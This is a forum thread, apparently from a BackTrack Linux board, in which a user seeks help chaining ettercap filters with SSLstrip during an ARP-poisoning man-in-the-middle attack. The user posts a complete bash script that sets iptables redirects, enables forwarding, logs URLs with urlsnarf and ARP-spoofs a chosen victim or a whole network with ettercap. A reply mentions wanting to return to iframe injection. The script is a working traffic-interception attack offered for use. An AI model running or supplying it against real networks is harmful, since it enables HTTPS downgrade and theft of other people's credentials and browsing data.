
Thread: Routing ettercap traffic ipt_owner alternative?

  1. #1
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    5

    Routing ettercap traffic ipt_owner alternative?

    Hello,

    I've googled for days and haven't found a simple answer to my issue. I am trying to get ettercap filters to work along with SSLstrip while doing an arp poisoning MITM attack. I am able to get filters to work fine without SSLstrip but once I enable SSLstrip the filters stop working. I believe this is because the PREROUTING command used in most tutorials and scripts sends everything to sslstrip before ettercap is done with the packets. I believe an OUTPUT rule defined by guid would take care of the problem. However, BT4 R1 doesn't include the ipt_owner module.

    1) Is there an easy way to get the ipt_owner module working? I see a lot of posts telling people not to recompile.. and I've never done so before but I'm willing to play around since I have my USB persistent install cloned to another drive.

    2) Is there an alternate method of routing only traffic originating from ettercap to sslstrip?
    I was thinking something along the lines of:


    Code:
    iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner ettercap --dport 80 -j REDIRECT --to-port 10000
    to replace:

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    Am I approaching this correctly? Is there another way to do it?


    Thanks for any advice and the great distro/resources here.

    Here is the full script.

    Code:
    #!/bin/bash
    # modified scripts found on backtrack-linux.org by killadninja, tedbear
    # Make sure /etc/etter.conf is commented out as such 
    # if you use iptables:
       #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
    read -e SESSION
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    
    mkdir /root/$SESSION/
    
    # Setup network
    echo "[+] Setting up iptables"
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 1
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    #xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k -w /root/$SESSION/$SESSION.log &
    sleep 2
    
    # urlsnarf
    echo "[+] Starting urlsnarf..."
    urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
    sleep 1 
    
    #arpspoof
    #echo "[+] Starting arpspoof..."
    #xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.79 192.168.1.1 &
    #xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.1 192.168.1.79 &
    
    # Ettercap
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -F ig.ef -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -P autoadd -M arp:remote /"$ROUTER"/ /"$VICTIM"/ &
    cat /proc/sys/net/ipv4/ip_forward
    iptables -t nat -L
    #auto add hosts append -P autoadd 
    sleep 1
    
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close mitmssl and clean up properly by hitting y,
    if mitmssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ "$WISH" = "y" ] ; then
    echo
    echo "[+] Cleaning mitmssl and resetting iptables..."
    killall sslstrip
    killall ettercap
    killall python
    killall urlsnarf
    killall xterm
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using mitmssl Good Bye..."
    exit
    
    fi 
    exit

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Re: Routing ettercap traffic ipt_owner alternative?

    Thanks for the information. I could never get the ettercap filters to work at all; now at least I know it's because of SSLStrip and I can go back to trying iframe injection and other goodies.
    Hope you find an answer to your question as it would be helpful to many others.
